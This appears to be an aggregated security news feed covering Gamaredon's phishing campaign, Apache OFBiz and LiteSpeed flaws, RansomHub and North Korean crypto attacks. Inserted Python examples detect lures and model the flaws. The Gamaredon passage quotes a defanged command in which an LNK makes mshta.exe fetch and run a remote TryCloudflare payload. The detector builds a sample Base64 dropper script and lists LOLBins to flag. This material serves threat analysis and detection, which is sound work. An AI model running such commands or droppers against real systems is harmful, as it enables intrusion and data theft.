The obfuscation is a deliberate tactic to evade detection by security systems. The JavaScript runs silently, writing a RAR archive into the victim’s Downloads directory; the archive is made to look like a legitimate file, further tricking the user. The RAR file contains a Windows shortcut (LNK) file. When executed, this shortcut launches mshta.exe against a remote .tar archive. Gamaredon has used TryCloudflare’s one-time tunnel feature to host these malicious files. By leveraging TryCloudflare, the attackers get a temporary, anonymous tunnel from which to serve their payloads while sidestepping traditional detection methods. The specific command executed by the LNK file is: “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f” This command makes mshta.exe retrieve and run the file from the TryCloudflare domain (mshta.exe executes whatever HTML Application content it is handed, regardless of the .tar extension). The Gamaredon Campaign’s Scale and Impact The ongoing campaign is notable for its scale and its execution. The frequency and volume of spear-phishing emails indicate a highly coordinated effort. The use of TryCloudflare’s one-time tunnel feature shows the group’s ingenuity in circumventing traditional cybersecurity measures. A key component of this campaign is the inclusion of a 1-pixel remote image within the malicious files. This image acts as a tracking mechanism, allowing the attackers to monitor interactions with their phishing content and gauge the effectiveness of their attacks. While CRIL’s investigation was unable to retrieve the contents of the .tar files, analyses from other cybersecurity researchers, such as Cisco Talos, suggest that these archives likely contain additional malicious payloads designed to exfiltrate sensitive information from compromised systems.
Implications for Cybersecurity and Recommendations To counteract sophisticated spear-phishing attacks, organizations, particularly those in sensitive sectors like the military, must adopt comprehensive cybersecurity strategies. First, user training is essential. Educating users on how to recognize spear-phishing attempts, especially those involving unexpected military-themed attachments or messages, is crucial. Awareness plays a significant role in reducing the success rate of such attacks. Advanced email security is another critical component. Implementing email security solutions with advanced threat protection capabilities helps filter out phishing emails and malicious attachments effectively. In addition, deploying robust anti-malware solutions is necessary. These tools should be capable of detecting and blocking obfuscated JavaScript code and malicious LNK files. Regular updates and scans are essential for maintaining protection against online threats. Network monitoring is also vital. Keeping an eye out for unusual network activity, such as connections to TryCloudflare’s one-time tunnels or other unknown external resources, helps in the early detection of anomalies, which can prevent further infiltration. Application whitelisting should be used to allow only trusted applications and scripts to run on systems. This measure helps prevent the unauthorized execution of potentially harmful files. Lastly, leveraging threat intelligence platforms is important for blocking known malicious domains, including those abused by groups like Gamaredon. Staying updated with the latest threat intelligence provides an edge in preemptively countering cyberattacks. The Gamaredon campaign represents a significant escalation in cyber threats targeting Ukrainian military personnel. 
Through the use of spear-phishing emails, malicious XHTML attachments, and advanced evasion techniques like TryCloudflare’s one-time tunnel feature, Gamaredon continues to refine and intensify its attacks. The persistence and scale of this campaign highlight the importance of maintaining vigilant and proactive cybersecurity measures.
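The two detection points the recommendations above call for (obfuscated JavaScript in an XHTML attachment, and an LNK file that points a Windows script host at a TryCloudflare tunnel) can be checked mechanically. Below is an added example written for this page, not Cyble's or Talos's tooling. It parses an XHTML lure, pulls the text of any id-bearing div, strips non-Base64 noise characters, decodes the result and looks for the browser file-dropping API calls a smuggling script needs; it also records 1-pixel remote images, and classifies a process command line by whether a LOLBin such as mshta.exe is being pointed at a remote URL. The sample lure, its noise scheme (one junk character after every seventh Base64 character) and the tracking-pixel host are constructed for the example; the article does not document the real obfuscation scheme. The LNK command line is the one quoted in the article, kept in its defanged form and refanged only for matching.

```python
import base64
import re
from html.parser import HTMLParser

# Anything outside the Base64 alphabet is treated as injected noise.
NOT_B64 = re.compile(r"[^A-Za-z0-9+/=]")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s\"']*", re.I)
# Strings a decoded browser-side dropper needs in order to write a file to Downloads.
SMUGGLING_MARKERS = (b"Blob(", b"msSaveOrOpenBlob", b"createObjectURL", b"download", b".rar")
# Windows script hosts commonly launched from LNK files to fetch remote content.
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}


class LureParser(HTMLParser):
    """Collect the text of every id-bearing <div> and every 1x1 remote <img>."""

    def __init__(self):
        super().__init__()
        self._open_divs = []
        self.blobs = {}
        self.pixels = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "div":
            self._open_divs.append(a.get("id"))
        elif tag == "img" and a.get("width") == "1" and a.get("height") == "1":
            if (a.get("src") or "").startswith(("http://", "https://")):
                self.pixels.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "div" and self._open_divs:
            self._open_divs.pop()

    def handle_data(self, data):
        for div_id in self._open_divs:
            if div_id:
                self.blobs[div_id] = self.blobs.get(div_id, "") + data


def deobfuscate(blob):
    """Strip noise characters, repair padding and decode; None if it is not Base64 at all."""
    cleaned = NOT_B64.sub("", blob)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned, validate=True)
    except ValueError:
        return None


def scan_lure(document):
    """Report divs hiding a Base64 file-dropper script, plus any tracking pixels."""
    parser = LureParser()
    parser.feed(document)
    smuggled = []
    for div_id, blob in parser.blobs.items():
        if len(NOT_B64.sub("", blob)) < 64:
            continue  # too short to carry a script
        decoded = deobfuscate(blob)
        if not decoded:
            continue
        hits = [m.decode() for m in SMUGGLING_MARKERS if m in decoded]
        if hits:
            smuggled.append({"div_id": div_id, "decoded_bytes": len(decoded), "markers": hits})
    return {"smuggled": smuggled, "tracking_pixels": parser.pixels}


def refang(text):
    """Turn CTI-style defanged indicators (hxxps, [.]) back into their live form."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def classify_command(cmdline):
    """Flag a LOLBin being handed a remote URL; *.trycloudflare.com hosts rank highest."""
    argv = refang(cmdline).split()
    if not argv:
        return None
    exe = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in LOLBINS:
        return None
    m = URL_RE.search(" ".join(argv[1:]))
    if not m:
        return None
    host = m.group(1).lower()
    severity = "high" if host.endswith(".trycloudflare.com") else "medium"
    return {"binary": exe, "host": host, "severity": severity}


def salt_base64(b64, noise="#!-"):
    """Constructed obfuscation: a noise character after every seventh Base64 character."""
    return "".join(ch + (noise[i % 3] if i % 7 == 6 else "") for i, ch in enumerate(b64))


# Constructed sample lure (not a captured file): a browser-side RAR dropper, Base64-encoded,
# salted with noise and placed in <div id="jwu"> as the article describes.
DROPPER_JS = (b'var b=new Blob([p],{type:"application/octet-stream"});'
              b'var a=document.createElement("a");a.href=URL.createObjectURL(b);'
              b'a.download="instructions.rar";a.click();')
SAMPLE_XHTML = f"""<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml"><body>
<div id="jwu">{salt_base64(base64.b64encode(DROPPER_JS).decode())}</div>
<img src="https://tracker.example/pix.gif" width="1" height="1"/>
<script>/* a real lure would read #jwu, strip the noise, atob() it and eval */</script>
</body></html>"""

# The LNK command line quoted in the article, kept defanged.
SAMPLE_LNK_COMMAND = ('"C:\\Windows\\System32\\mshta.exe" '
                      'hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f')

if __name__ == "__main__":
    print(scan_lure(SAMPLE_XHTML))
    print(classify_command(SAMPLE_LNK_COMMAND))
```

Two caveats for production use: the noise-stripping step assumes the junk characters fall outside the Base64 alphabet, which a different campaign may not honour, and the command-line check keys on the TryCloudflare suffix only because this campaign abused it; any LOLBin fetching a remote URL from an LNK deserves the medium finding regardless of host.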
by The Cyber Express
2024-09-06 11:04:28
Atomic macOS Stealer leads sensitive data theft on macOSSophos X-Ops explores the distribution and capabilities of the Atomic macOS Stealer (AMOS)
by Sophos News
2024-09-06 11:00:19
1Password review: A premium password manager well worth the moneyUpgrade your security with 1Password, a premium password manager with useful features.
by ZDNET Security
2024-09-06 11:00:00
PowerShell Speech Recognition: How To Set up Voice Commands and ResponsesLearn how to create a PowerShell script that can listen to your voice and respond with spoken words.
by ITPro Today
2024-09-06 10:53:59
Key cyber insurance stakeholders urge government to help close $900B in uncovered riskMarsh McLennan and Zurich Insurance Group issued a white paper urging a public-private partnership to help tackle a growing coverage gap. The White House is working on a plan.
by Cybersecurity Dive
2024-09-06 10:52:12
Veeam Patches Critical Vulnerabilities in Enterprise ProductsVeeam has released patches for critical-severity vulnerabilities in Backup & Replication, ONE, and Service Provider Console. The post Veeam Patches Critical Vulnerabilities in Enterprise Products appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 10:52:00
Apache OFBiz Update Fixes High-Severity Flaw Leading to Remote Code ExecutionA new security flaw has been addressed in the Apache OFBiz open-source enterprise resource planning (ERP) system that, if successfully exploited, could lead to unauthenticated remote code execution on Linux and Windows. The high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5), affects all versions of the software before 18.12.16. “An attacker with no valid
by The Hacker News
2024-09-06 10:45:00
Therapy Sessions Exposed by Mental Health Care Firm’s Unsecured DatabaseVideo and audio of therapy sessions, transcripts, and other patient records were accidentally exposed in a publicly accessible database operated by the virtual medical company Confidant Health.
by WIRED Security News
2024-09-06 10:12:22
LiteSpeed Cache Plugin Vulnerability Exposes Millions of WordPress Sites to AttacksA vulnerability in the LiteSpeed Cache WordPress plugin leads to the exposure of sensitive information, including user cookies. The post LiteSpeed Cache Plugin Vulnerability Exposes Millions of WordPress Sites to Attacks appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 10:01:42
Critical RCE Vulnerability Patched in Apache OFBiz (CVE-2024-45195)Apache OFBiz, the popular open-source enterprise resource planning (ERP) system, was recently found to harbor a critical remote code execution (RCE) vulnerability. Tracked as CVE-2024-45195, the flaw could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers running OFBiz. The Apache security team has addressed the issue in the latest update and urges users to patch their installations immediately. Understanding the Apache OFBiz RCE Vulnerability (CVE-2024-45195) The vulnerability, discovered by Rapid7 security researchers, stems from missing authorization checks within the OFBiz web application. This weakness, categorized as a forced-browsing vulnerability, exposes restricted paths to unauthenticated direct-request attacks. “An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server,” security researcher Ryan Emmons explained in a report. In simpler terms, an attacker could exploit this vulnerability by crafting a specially designed URL that bypasses the authorization checks. If successful, this could grant the attacker the ability to execute malicious code on the server, potentially leading to complete system compromise. Potential Consequences of the Exploit The consequences of exploiting CVE-2024-45195 could be severe for organizations relying on OFBiz. Here are some potential risks: Data Theft and Leakage: Attackers could gain access to sensitive information stored on the server, including customer data, financial records, and intellectual property. Disruption of Operations: The execution of malicious code could disrupt critical business processes, leading to downtime and financial losses.
Lateral Movement and Persistence: Exploiting this vulnerability could be a stepping stone for attackers to gain a foothold in the network and launch further attacks within the system. Apache Patches Flaw The Apache Software Foundation (ASF) has released a patch (version 18.12.16) that addresses CVE-2024-45195. This update strengthens the authorization checks within the OFBiz application, preventing unauthorized access to restricted paths. Emmons explained that CVE-2024-45195 is a bypass of the patches for three other OFBiz vulnerabilities addressed in the past few months, tracked as CVE-2024-32113, CVE-2024-36104 and CVE-2024-38856. CVE-2024-32113 has been exploited in attacks using the Mirai botnet, highlighting the serious risks associated with such flaws. Meanwhile, CVE-2024-38856 was rated with a CVSS score of 9.8 by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), classifying it as critical in severity. That vulnerability allowed attackers to execute remote code without prior authentication, posing a severe risk to affected systems. “Based on our analysis, three of these vulnerabilities are, essentially, the same vulnerability with the same root cause,” Emmons said. All of them are caused by a controller-view map fragmentation issue that enables attackers to execute code or SQL queries and achieve remote code execution without authentication. The latest patch “validates that a view should permit anonymous access if a user is unauthenticated, rather than performing authorization checks purely based on the target controller.” Importance of Security in Open-Source Software The discovery of CVE-2024-45195 serves as a reminder of the importance of security in open-source software. While open-source tools offer numerous benefits, they also require consistent vigilance and patching to address vulnerabilities promptly.
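The root cause described above, an authorization decision made on the request (controller) entry while the view actually rendered can be chosen separately, is easier to see in a small model than in the OFBiz code base. The following is an added example written for this page; it is not OFBiz's dispatcher and the request names, view names and the "/control/request/overrideView" path shape are hypothetical stand-ins, assumed for illustration. The vulnerable dispatcher authorizes the request URI only, so an anonymous caller can pair a public request with a restricted view; the fixed dispatcher adds the check the patch describes, requiring the resolved view itself to permit anonymous access when the caller is unauthenticated.

```python
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the dispatcher refuses to serve a request."""


@dataclass(frozen=True)
class RequestMap:
    """Controller entry: a request URI, whether it needs a login, and the view it renders."""
    uri: str
    auth_required: bool
    default_view: str


@dataclass(frozen=True)
class ViewMap:
    """View entry; anonymous_ok is this model's stand-in for the view's own access policy."""
    name: str
    anonymous_ok: bool
    effect: str  # what rendering the view does; the dangerous views run privileged logic


# Hypothetical maps (not OFBiz's real controller.xml): one public request, one admin-only
# request, and the views they render.
REQUESTS = {
    "help": RequestMap("help", auth_required=False, default_view="HelpPage"),
    "exportData": RequestMap("exportData", auth_required=True, default_view="ExportTool"),
}
VIEWS = {
    "HelpPage": ViewMap("HelpPage", anonymous_ok=True, effect="static help text"),
    "ExportTool": ViewMap("ExportTool", anonymous_ok=False, effect="runs export script on server"),
}


def parse_path(path):
    """'/control/help/ExportTool' -> ('help', 'ExportTool'); a third segment overrides the view."""
    parts = [p for p in path.split("/") if p]
    if len(parts) < 2 or parts[0] != "control":
        raise KeyError(path)
    return parts[1], (parts[2] if len(parts) > 2 else None)


def dispatch_vulnerable(path, authenticated):
    """Pre-fix behaviour: authorization is decided from the request URI alone."""
    req_uri, override = parse_path(path)
    req = REQUESTS[req_uri]
    if req.auth_required and not authenticated:
        raise Forbidden(req_uri)
    view = VIEWS[override or req.default_view]  # the override is never re-checked
    return view.effect


def dispatch_fixed(path, authenticated):
    """Post-fix behaviour: an unauthenticated caller only reaches views that allow anonymous access."""
    req_uri, override = parse_path(path)
    req = REQUESTS[req_uri]
    if req.auth_required and not authenticated:
        raise Forbidden(req_uri)
    view = VIEWS[override or req.default_view]
    if not authenticated and not view.anonymous_ok:
        raise Forbidden(view.name)  # the check the patch adds
    return view.effect


def demo():
    """Same anonymous override request through both dispatchers: (what leaked, whether the fix blocked it)."""
    path = "/control/help/ExportTool"
    leaked = dispatch_vulnerable(path, authenticated=False)
    try:
        dispatch_fixed(path, authenticated=False)
        blocked = False
    except Forbidden:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The lesson generalizes beyond OFBiz: whenever a framework lets the caller name the target resource in more than one place, the authorization check has to run against the resource that will actually be served, not against the first name the router happened to look at.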
Users are responsible for keeping their deployments up-to-date and implementing additional security measures to mitigate risks. The patching of CVE-2024-45195 is a positive step forward, but it’s vital to remain vigilant. The ever-evolving cyber threat landscape necessitates continuous monitoring and proactive security measures. By implementing a comprehensive security strategy, organizations using OFBiz can minimize their attack surface and safeguard their critical data.
by The Cyber Express
2024-09-06 10:01:31
Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195)For the fourth time in the last five months, Apache OFBiz users have been advised to upgrade their installations to fix a critical flaw (CVE-2024-45195) that could lead to unauthenticated remote code execution. About CVE-2024-45195 Apache OFBiz is an open-source suite for enterprise resource planning (ERP), which contains web applications for human resources management, customer relationship management, accounting, marketing, etc. “Apache OFBiz is used by numerous large organizations, and previously disclosed vulnerabilities for it have … More → The post Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195) appeared first on Help Net Security.
by Help Net Security
2024-09-06 10:00:02
Vulnerability in Tencent WeChat custom browser could lead to remote code executionWhile this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.
by Cisco Talos Blog
2024-09-06 09:48:02
Unlock Business Value Through Effective DevOps Infrastructure ManagementEffective DevOps infrastructure management is key to accelerating development cycles, enhancing collaboration, and maintaining security while aligning with organizational goals and customer needs.
by ITPro Today
2024-09-06 09:45:10
New cyber hiring sprint aims to address workforce gapOngoing gaps in the U.S. cybersecurity workforce that have left nearly half a million jobs unfilled have prompted the Office of the National Cyber Director to introduce the new Service for America cyber hiring sprint that would link jobseekers to cyber jobs within the next two months.
by SC Media
2024-09-06 09:43:46
CISA Breaks Silence on Controversial ‘Airport Security Bypass’ VulnerabilityResearchers and the TSA have different views on the impact of vulnerabilities in an airport security application that could allegedly allow the bypass of certain airport security systems. The post CISA Breaks Silence on Controversial ‘Airport Security Bypass’ Vulnerability appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 09:34:58
Zero-trust adoption almost completed by most federal agenciesZero-trust implementation has been 87% completed across federal agencies on average ahead of the September 30 deadline.
by SC Media
2024-09-06 09:32:00
Critical Apache OFBiz flaw patchedSuch a vulnerability evades fixes issued for previous OFBiz bugs, tracked as CVE-2024-38856, CVE-2024-36104, and CVE-2024-32113, all of which have resulted from a fragmentation issue within the controller-view map that could allow unauthenticated remote code or SQL query execution, according to Rapid7 security researchers.
by SC Media
2024-09-06 09:32:00
Pavel Durov Criticizes Outdated Laws After Arrest Over Telegram Criminal ActivityTelegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided. “If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself,” Durov said in a 600-word statement on his Telegram account. “Using laws from the pre-smartphone era to charge a CEO with crimes committed
by The Hacker News
2024-09-06 09:26:21
Widespread WordPress site takeovers likely with critical LiteSpeed Cache bugExploitation of the flaw, which stems from LiteSpeed Cache’s debug logging functionality, could be conducted by attackers with ‘/wp-content/debug.log’ file access to exfiltrate users’ session cookies, spoof admin users, and takeover websites.
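Whether a site is exposed by this class of bug comes down to two things an administrator can check locally: does wp-content/debug.log exist, and does it contain session cookies. The following is an added example written for this page, not part of the plugin or of any vendor advisory. It scans a debug log for WordPress login cookies (wordpress_logged_in_<hash> and wordpress_sec_<hash>, whose URL-encoded value begins with the username), reports which users' sessions are exposed, and notes whether the file is world-readable. The log lines are constructed for the example and do not reproduce the plugin's real log format; the checks only assume that request headers, including Cookie, were written to the file.

```python
import pathlib
import re
import stat
import tempfile
from urllib.parse import unquote

# WordPress session cookies are named wordpress_logged_in_<md5> and wordpress_sec_<md5>;
# their value is "username|expiry|token|hmac", URL-encoded, so a leaked value names the user.
SESSION_COOKIE = re.compile(r"\b(wordpress_(?:logged_in|sec)_[0-9a-f]{32})=([^;\s]+)")


def leaked_sessions(log_text):
    """Map each user whose session cookie appears in the log to the cookie names seen."""
    found = {}
    for name, value in SESSION_COOKIE.findall(log_text):
        user = unquote(value).split("|", 1)[0]
        found.setdefault(user, set()).add(name)
    return {user: sorted(names) for user, names in found.items()}


def audit_debug_log(wp_content):
    """Check whether wp-content/debug.log exists, is world-readable and leaks sessions."""
    log = pathlib.Path(wp_content) / "debug.log"
    if not log.exists():
        return {"exists": False}
    st = log.stat()
    return {
        "exists": True,
        "bytes": st.st_size,
        "world_readable": bool(st.st_mode & stat.S_IROTH),
        "leaked_sessions": leaked_sessions(log.read_text(errors="replace")),
    }


# Constructed sample (not a captured log). SITE_HASH stands in for md5(siteurl).
SITE_HASH = "3c9f1e0b8a7d6c5e4f3a2b1c0d9e8f7a"
SAMPLE_LOG = "\n".join([
    f"09/06/24 10:12:01 [198.51.100.7 GET /wp-admin/edit.php] Cookie: "
    f"wordpress_logged_in_{SITE_HASH}=alice%7C1725700000%7Ctok1%7Cmac1; wp-settings-1=m1",
    "09/06/24 10:12:05 [203.0.113.9 GET /] Cookie: -",
    f"09/06/24 10:13:40 [198.51.100.7 POST /wp-admin/admin-ajax.php] Cookie: "
    f"wordpress_sec_{SITE_HASH}=bob%7C1725700000%7Ctok2%7Cmac2",
    f"09/06/24 10:14:02 [198.51.100.7 GET /wp-admin/] Cookie: "
    f"wordpress_logged_in_{SITE_HASH}=alice%7C1725700000%7Ctok1%7Cmac1",
])


def write_sample(directory):
    """Create wp-content/debug.log with the sample lines and a typical 0644 mode."""
    wp_content = pathlib.Path(directory) / "wp-content"
    wp_content.mkdir(parents=True, exist_ok=True)
    log = wp_content / "debug.log"
    log.write_text(SAMPLE_LOG + "\n")
    log.chmod(0o644)
    return wp_content


def run_demo():
    """Build the sample tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_debug_log(write_sample(tmp))


if __name__ == "__main__":
    print(run_demo())
```

A non-empty leaked_sessions result means every listed user's session should be invalidated (changing the password or rotating the site's auth salts in wp-config.php does this), the log removed, debug logging turned off, and web access to wp-content/debug.log denied at the web server; the file-mode check matters because the same file is readable by any other process on a shared host.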
by SC Media
2024-09-06 09:25:35
Misconfigured Elasticsearch database exposes 762K Chinese car ownersIndividuals’ full names, birthdates, phone numbers, ID numbers, email addresses, home addresses, vehicle identification numbers, car brands and models, engine numbers, and vehicle colors were leaked by the unsecured Elasticsearch instance.
by SC Media
2024-09-06 09:24:53
Multiple Cisco product vulnerabilities addressedThreat actors could leverage CVE-2024-20439 via static credentials to facilitate the compromise of targeted systems with administrative privileges while intrusions involving CVE-2024-20440 could enable the acquisition of log files with credentials and other sensitive details.
by SC Media
2024-09-06 09:20:11
SonicWall SSLVPN access control flaw is now exploited in attacksSonicWall is warning that a recently fixed access control flaw tracked as CVE-2024-40766 in SonicOS is now “potentially” exploited in attacks, urging admins to apply patches as soon as possible. [...]
by BleepingComputer
2024-09-06 09:18:00
Penpie loses over $27M from crypto heistImmediate withdrawal and deposit takedowns, as well as notifications to the FBI’s Internet Crime Complaint Center and the Singaporean police have been conducted by Penpie following the theft on Tuesday.
by SC Media
2024-09-06 09:16:00
Is this a major breakthrough in quantum security?We’re focused on… Developments in quantum cryptography. Why? Because a breakthrough by scientists at Oxford University Physics, announced in April 2024, has taken us a step closer to the possibility of individuals and companies leveraging the power of quantum computing – by guaranteeing privacy and security. The breakthrough was laid out in a study, published in the journal Physical Review Letters. One of the lead researchers, Professor David Lucas, said in a statement: “Never in history have the issues surrounding privacy of data and code been more urgently debated than in the present era of cloud computing and artificial intelligence. As quantum computers become more capable, people will seek to use them with complete security and privacy over networks, and our new results mark a step change in capability in this respect.” Where does the urgency behind quantum security come from? When we interviewed cryptography expert Ahmad Almorabea (Senior Penetration Testing Consultant at TCC), we asked if he thinks there’s a risk that industries and governments will be too slow to implement quantum-safe cryptography before quantum computing technology becomes more accessible on open markets. “Yes, there’s a risk,” he said. “Quantum computing’s advancement could potentially break current encryption methods.” “If industries/governments don’t act swiftly to adopt quantum-safe cryptography, sensitive data could be vulnerable in the future. And there are many aspects in cryptography that could be broken, while Quantum computing advances (i.e. key derivation, encryption algorithms, PKI and more).” Speaking on the developments in quantum cryptography that he was particularly optimistic about, Almorabea added: “I believe cryptographic algorithms will be able to search in encrypted texts without the need for understanding the actual texts available. And it’s a big step towards having our privacy back. 
“I’m excited about the improvement happening in cryptographic algorithms using AI. In scenarios where learning models need to be applied on sensitive data, AI cryptography plays a vital role in preserving privacy.” What does the new Oxford University Physics research show? Right now, quantum computing has to operate within highly controlled conditions in order to remain stable, and there are growing concerns about how quickly quantum computing could break existing security and encryption systems. The new study shows that quantum computing in the cloud can be accessed in a way that’s both scalable and practical, and that gives users complete data privacy and security, along with the ability to verify the authenticity of data. They used an approach called ‘blind quantum computing’, which connects two completely separate quantum computing entities (which could, for example, be a person at home accessing a cloud server) in a secure way. Using a combination of quantum memory and photons, researchers developed a system made up of a fibre network link between a server and a photon-detecting device at an independent computer that remotely accesses the server’s cloud services. Study co-lead Dr Peter Drmota said: “Using blind quantum computing, clients can access remote quantum computers to process confidential data with secret algorithms and even verify the results are correct, without revealing any useful information. Realising this concept is a big step forward in both quantum computing and keeping our information safe online.” Ultimately, this could enable commercial development of quantum-enabled devices. Through blind quantum computing, secure devices that safeguard data when users access cloud quantum computing services could be scalable for commercial markets. P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!
by HACKLIDO
2024-09-06 09:00:00
Cybersecurity Snapshot: RansomHub Group Triggers CISA Warning, While FBI Says North Korean Hackers Are Targeting Crypto OrgsCybersecurity teams must beware of RansomHub, a surging RaaS gang. Plus, North Korea has unleashed sophisticated social-engineering schemes against crypto employees. Meanwhile, a new SANS report stresses the importance of protecting ICS and OT systems. And a Tenable poll sheds light on cloud-native VM. And much more! Dive into six things that are top of mind for the week ending September 6.
1 - CISA: Keep RansomHub RaaS gang on your radar screen
RansomHub, a relatively new ransomware group, has become a serious threat as its successful ransomware-as-a-service (RaaS) model increasingly lures prominent affiliates away from competitors like LockBit. That’s the warning from CISA, which urges cyber teams to protect their organizations by keeping software updated, adopting phishing-resistant multi-factor authentication and training employees to recognize phishing attacks. In an advisory titled “#StopRansomware: RansomHub Ransomware,” CISA details the RaaS gang’s tactics, techniques and procedures, as well as its indicators of compromise, and offers mitigation recommendations. RansomHub and its affiliates have successfully attacked at least 210 organizations from a wide variety of industries, including from multiple critical infrastructure sectors.
Highlights from the advisory include:
- RansomHub affiliates use double extortion, meaning they encrypt victims’ systems and exfiltrate their data.
- Preferred initial-access targets include internet-exposed systems and endpoints, while its go-to attack methods are phishing emails, known-vulnerability exploitation and password spraying.
- These known vulnerabilities have been exploited: CVE-2023-3519, CVE-2023-27997, CVE-2023-46604, CVE-2023-22515, CVE-2023-46747, CVE-2023-48788, CVE-2017-0144, CVE-2020-1472 and CVE-2020-0787.
Recommended mitigation measures include:
- Adopt a recovery plan for storing critical data in locations that are physically separate, segmented and secure. Back up data offline and encrypt it.
- Enforce strong-password requirements.
- Keep all operating systems, software and firmware updated.
- Protect administrator accounts with phishing-resistant MFA, least-privilege principles and time-based access, like the just-in-time access method.
- Segment networks and monitor them for unusual and suspicious activity.
- Check for unrecognized accounts in domain controllers, servers, workstations and directories.
Previously known as Cyclops and Knight, RansomHub was launched in February of this year and ranked as the most active ransomware group in July with 11% of all attacks, according to NCC Group. The FBI, the Multi-State Information Sharing and Analysis Center (MS-ISAC) and the Department of Health and Human Services (HHS) partnered with CISA on this advisory.
For more information about ransomware trends and security best practices:
- “Ransomware Is ‘More Brutal’ Than Ever in 2024” (Wired)
- “How Can I Protect Against Ransomware?” (CISA)
- “How to prevent ransomware in 6 steps” (TechTarget)
- “Steps to Help Prevent & Limit the Impact of Ransomware” (Center for Internet Security)
- “Ransomware: How to prevent and recover” (Canadian Centre for Cyber Security)
2 - FBI: North Korean hackers go after crypto players
Using intricate, persistent and stealthy social-engineering schemes, North Korea’s government is targeting staffers at crypto organizations to steal cryptocurrency by breaching their networks using malware. Specifically, hackers acting on behalf of North Korea’s government have their sights set on organizations that offer cryptocurrency exchange-traded funds (ETFs) and other crypto-based financial products. That’s according to the FBI, which this week issued an alert for companies in the cryptocurrency sector titled “North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks.” “North Korea employs sophisticated tactics to steal cryptocurrency funds and is a persistent threat to organizations with access to large quantities of cryptocurrency-related assets or products,” reads the FBI alert.
Tactics employed by these North Korean hackers include:
- Conducting thorough and detailed research on employees of the crypto organizations they intend to target
- Creating elaborate fake offers such as employment and investment opportunities that are tailored for each targeted individual
- Interacting extensively one-on-one with the victims, often impersonating real people, such as recruiters
- Requesting that targets execute code or download apps on company-owned devices, conduct “pre-employment” technical tests or exercises involving the execution of packages and scripts, or run a script in order to enable voice calls or video meetings
Among the FBI’s recommended mitigations are:
- Develop methods to verify a contact’s identity.
- Don’t keep crypto-wallet information, such as logins and passwords, on devices connected to the internet.
- Decline to take pre-employment tests or to execute code on company-owned devices.
- Conduct multiple authentication checks and require approvals from unconnected networks before carrying out financial transactions.
For more information about crypto hacking trends:
- “Crypto hacking thefts double to $1.4 bln in first half of 2024” (Reuters)
- “Can Crypto Be Hacked?” (Investopedia)
- “2024 Crypto Crime Mid-year Update Part 1 and Part 2” (Chainalysis)
- “The 6 biggest crypto heists of all time” (Quartz)
- “Indian crypto platform WazirX confirms $230 million stolen during cyberattack” (The Record)
3 - Tenable surveys webinar attendees on cloud-native VM
During our recent webinar “A Cyber Pro’s Guide to Cloud-Native Vulnerability Management,” we polled attendees about issues related to cloud VM and cloud-native technologies. See what they said about their cloud-native application challenges and cloud VM strategies! (Chart: 62 webinar attendees polled by Tenable, August 2024) (Chart: 49 webinar attendees polled by Tenable, August 2024) Want to learn more about the benefits of agentless cloud security and about extending your VM strategy to the cloud? Watch the on-demand webinar “A Cyber Pro’s Guide to Cloud-Native Vulnerability Management” today.
4 - SANS: Businesses can’t ignore security of ICS and OT
Looking for insights and best practices to boost the cybersecurity of your industrial control systems (ICS) and operational technology systems (OT)? You might want to check out SANS Institute’s new guide “ICS Is the Business: Why Securing ICS/OT Environments Is Business-Critical in 2024.” The guide stresses that protecting ICS and OT systems is essential for business success and that to secure ICS and OT systems you can’t use the same strategy, processes and tools you employ to protect the IT environment. “The steps outlined here are essential for ensuring that our industrial systems continue to operate safely and reliably,” author Dean Parsons, a SANS Certified Instructor, said in a statement.
Topics covered in the paper include:
- An overview of the top threats impacting ICS and OT systems, including targeted, tailored strikes against these environments; ransomware attacks; supply chain breaches; and attacks that originate in the IT network.
- The differences between IT and ICS/OT environments, and why they require a different security approach.
- Five critical cybersecurity controls for ICS/OT: ICS-specific incident response; network architecture that supports defensible controls, like segmentation and log collection; ICS network visibility and monitoring; ICS secure remote access; and risk-based ICS vulnerability management.
- How to use AI to bolster ICS/OT security.
- The ways in which CISOs can advance their organizations’ ICS/OT security maturity.
For more information about OT security, check out these Tenable resources:
- “Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)
- “How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)
- “Securing The Manufacturing Shop Floor” (white paper)
- “Fortifying Your OT Environment: Vulnerability and Risk Mitigation Strategies” (on-demand webinar)
- “CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It?” (blog)
5 - Cybersecurity among top techs getting an AI boost
